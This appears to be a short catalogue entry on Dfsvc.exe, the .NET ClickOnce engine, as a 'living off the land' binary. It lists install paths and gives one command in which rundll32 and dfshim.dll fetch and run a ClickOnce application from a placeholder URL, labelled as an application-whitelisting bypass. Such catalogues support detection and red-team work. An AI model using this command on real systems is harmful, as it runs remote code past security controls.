~/ cat Dfsvc.exe.md █
ClickOnce engine in Windows used by .NET
Paths:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
Detection:
AWL bypass
Executes click-once-application from Url
rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo